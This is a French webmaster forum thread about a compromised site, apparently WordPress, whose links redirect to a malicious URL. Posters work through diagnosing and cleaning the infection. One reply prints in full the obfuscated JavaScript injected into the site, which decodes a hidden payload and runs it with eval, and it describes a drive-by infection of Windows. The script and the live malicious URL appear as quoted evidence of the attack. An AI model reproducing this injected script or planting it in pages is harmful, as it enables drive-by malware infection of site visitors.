Tous les liens du site redirige vers http://io-trio.com/esd.php

Georges van luik · 25 Décembre 2012

Bonjour à tous et joyeux Noël !

Je viens vers vous car un des site dont je me suis occupé dernièrement rencontre un sérieux problème que je n'avais rencontré avant.
Tous les liens sur google, ou sur tout autre site renvoi vers cette adresse http://io-trio.com/esd.php

Le site est toujours en ligne et pas d'autres problèmes apparent.
On peut y accéder en écrivant l'url http://www.extensions-plumes-fournisseur.fr

Donc est-ce un piratage ? Autre ?

Mais surtout comment y remédier ?

Merci pour vos lumières

guicara · 25 Décembre 2012

Bonsoir,

Ton site utilise une version de WordPress qui est dépassé (vérifie également les versions des plugins). C'est comme ça qu'un malware l'a affecté. Ce malware fait des redirections 301 des liens vers http://io-trio.com/esd.php.

Code du malware :

Code:

<script type="text/javascript" language="javascript" > try{window.document.body++}catch(gdsgsdg){dbshre=57;}if(dbshre){asd=0;try{d=document.createElement("div");d.innerHTML.a="asd";}catch(agdsg){asd=1;}if(!asd){e=eval;}ss=String;asgq=new Array(31,94,110,104,94,107,97,104,104,27,31,33,25,117,8,1,24,25,26,27,109,89,107,26,111,23,53,25,94,106,90,109,102,95,105,107,38,92,108,96,88,108,94,63,103,92,101,94,104,111,31,31,98,96,109,88,101,94,33,36,50,5,3,7,5,23,24,25,26,111,37,107,107,93,27,52,24,32,98,111,107,104,51,41,42,96,103,38,110,109,96,103,39,93,106,100,39,94,109,95,37,104,97,106,34,50,5,3,26,27,23,24,109,40,110,107,113,101,95,41,103,103,108,99,111,96,103,103,26,56,23,31,90,92,110,102,100,110,110,96,30,51,6,4,27,23,24,25,110,41,106,108,114,102,96,37,90,104,108,95,92,106,25,55,27,30,40,32,53,8,1,24,25,26,27,107,38,108,110,116,99,93,39,98,96,96,95,97,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,111,37,107,109,115,103,92,38,112,99,95,107,96,25,55,27,30,41,105,114,34,50,5,3,26,27,23,24,109,40,110,107,113,101,95,41,99,93,95,110,27,52,24,32,43,107,111,31,52,7,5,23,24,25,26,111,37,107,109,115,103,92,38,109,105,107,23,53,25,33,44,103,112,32,53,8,1,5,3,26,27,23,24,98,96,27,31,25,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,109,33,36,32,24,116,7,5,23,24,25,26,27,23,24,25,94,106,90,109,102,95,105,107,38,112,108,100,107,93,33,33,55,91,97,111,26,100,91,53,85,33,111,83,31,55,54,42,91,97,111,56,34,32,51,6,4,27,23,24,25,26,27,23,24,93,105,94,108,101,94,104,111,37,95,94,110,64,99,93,102,95,105,107,58,114,67,95,31,31,109,33,36,37,89,105,106,96,101,92,60,98,100,99,92,33,110,36,50,5,3,26,27,23,24,118,7,5,116,33,33,35,54);s="";for(i=0;i-440!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}</script>

Sur le poste ou j'ai testé (Windows 8, Firefox, ESET NOD32), à la simple visite de ton site, après avoir cliqué sur un lien de ton menu :
- ouverture d'une fenêtre Internet Explorer (après l'appel de http://io-trio.com/esd.php)
- exploitation d'une faille sur IE (je pense) car infection de rundll32.exe (dans System32)
- plantage de mon Windows 8 (écran gris, accès seulement au gestionnaire de tâches)
- nouvelle entrée dans la liste des programmes de démarrage (Task manager > Startup), porté par rundll32.exe, nommé : "напоминания Windows OOBE" et portant la description "Корпорация Майкрософт"

Inquiétant !

C'est bien la première fois qu'un malware arrive à outrepasser la protection de mon ESET NOD32.
Je cours voir si j'ai la dernière MAJ de la base des virus... et j’entamerais quelques recherches.

Georges van luik · 26 Décembre 2012

Je suis vraiment navré de ce problème engendré par ce lien !

J'ai cliqué plusieurs fois dessus je n'ai eu aucun problème ...

Si un modo pouvait éditer le message pour que personne ne clique sur ce lien cela serait plus prudent ...

flojeanc · 29 Décembre 2012

J'ai exactement le même problème avec le même code qui infecte mon site (mais je n'utilise pas WordPress ).
Il y a 5 jours j'ai supprimer les fichiers et remis une sauvegarde de fichiers "propre", mais j'avais omis 2 fichiers javascript et aujourd'hui ca recommence mon site me redirige vers une autre page (le.htaccess étant en cause dans la redirection).

J'ai donc remis une autre sauvegarde de mon site mais comment etre sur que mon site n'est plus infecté ... ?
Quelqu'un pourait-il m'expliquer ce que fait cette ligne ?:

Code:

for(i=0;i-473!=0;i++){if((020==0x10)&&window.document)s+=ss["fromCharCode"](1*asgq[i]-(i%5-5-4));}z=s;e(s);}